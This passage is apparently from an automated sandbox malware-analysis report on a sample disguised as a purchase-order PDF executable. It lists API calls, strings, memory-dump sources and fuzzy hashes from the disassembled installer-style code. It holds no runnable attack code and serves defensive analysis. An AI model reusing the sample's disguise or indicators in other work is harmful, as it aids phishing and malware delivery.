                                                                                                                                      • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                      • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                      • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                                    • API String ID: 2624150263-2957766633
                                                                                                                                    • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                    • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                    • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                    • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                    • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                                    • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                    • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                    • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                                    • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                    • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404354
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404385
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,?), ref: 004044CD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040450B
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                    • String ID: -B@$Call$N$open
                                                                                                                                    • API String ID: 3615053054-1446803726
                                                                                                                                    • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                    • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                    • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                    • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                    • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                    • API String ID: 222337774-899692902
                                                                                                                                    • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                    • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                    • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                    • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                    • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                    • CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                                    • "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe", xrefs: 0040632D
                                                                                                                                    • *?|<>/":, xrefs: 0040633B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-317498141
                                                                                                                                    • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                    • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                    • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                    • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                    • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                    • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                                                                    • MulDiv.KERNEL32(0007499C,00000064,000749A0), ref: 00402D4D
                                                                                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
